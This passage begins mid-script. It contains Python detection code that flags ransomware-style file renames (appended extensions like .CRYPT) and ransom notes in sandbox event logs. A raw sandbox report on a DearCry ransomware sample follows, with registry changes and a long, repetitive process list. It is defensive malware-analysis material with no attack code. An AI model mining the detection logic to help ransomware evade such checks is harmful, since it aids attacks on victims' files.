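# foo.dll.CRYPT -> original ext "dll", appended ext "CRYPT". Requiring a short
# original extension keeps names like x.resources.dll from counting as renamed.
DOUBLE_EXT_RE = re.compile(r"\.([A-Za-z0-9]{1,5})\.([A-Za-z0-9_]+)$")


def parse_rows(text):
    """Return (description, indicator, process, target) tuples, skipping the header."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m or m.group(1) == "Description":
            continue
        events.append(m.groups())
    return events


def basename(path):
    """Last component of a Windows path or registry path."""
    return path.rsplit("\\", 1)[-1]


def appended_extension(name):
    """Extension appended after an existing one, or None if the name looks untouched."""
    m = DOUBLE_EXT_RE.search(name)
    return m.group(2) if m else None


def analyze(events, min_renames=3):
    """Attribute events per process; flag processes that create >= min_renames files
    with one appended extension. Background-process events are only counted."""
    per_proc = defaultdict(list)
    for ev in events:
        per_proc[ev[2]].append(ev)
    report = {"background": Counter(), "flagged": {}}
    for proc, evs in per_proc.items():
        short = basename(proc)
        if short.lower() in BACKGROUND_PROCESSES:
            for desc, _, _, _ in evs:
                report["background"][(short, desc)] += 1
            continue
        ext_counter, notes, dirs = Counter(), [], set()
        for desc, indicator, _, _ in evs:
            if desc != "File created":
                continue
            name = basename(indicator)
            if name.lower() in NOTE_NAMES:
                notes.append(indicator)
                continue
            ext = appended_extension(name)
            if ext:
                ext_counter[ext] += 1
                dirs.add(indicator.rsplit("\\", 1)[0])
        if not ext_counter:
            continue
        ext, count = ext_counter.most_common(1)[0]
        if count >= min_renames:
            report["flagged"][short] = {
                "extension": ext,
                "renamed": count,
                "ransom_notes": notes,
                "directories": sorted(dirs),
            }
    return report


if __name__ == "__main__":
    result = analyze(parse_rows(SAMPLE_ROWS))
    for proc, hit in result["flagged"].items():
        print(f"{proc}: {hit['renamed']} files renamed to .{hit['extension']}, "
              f"{len(hit['ransom_notes'])} note(s) dropped")
    for (proc, desc), n in result["background"].items():
        print(f"background {proc}: {desc} x{n}")
```

On the constructed rows the sample is flagged for three `.CRYPT` creations and one `readme.txt`, while the explorer.exe and SearchApp.exe rows land in the background bucket. Raising `min_renames` above the number of observed renames clears the flag, which is the knob to tune against the rename counts the report lists in its "Renames multiple (N) files" signatures.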
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{01F335E3-116A-44B8-9A60-FB114F4828FF} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{7DFF2A75-63E2-405F-8B9E-F885FB935DF0} | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{A5B63874-4B71-4074-841A-5A07F07E9565} | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
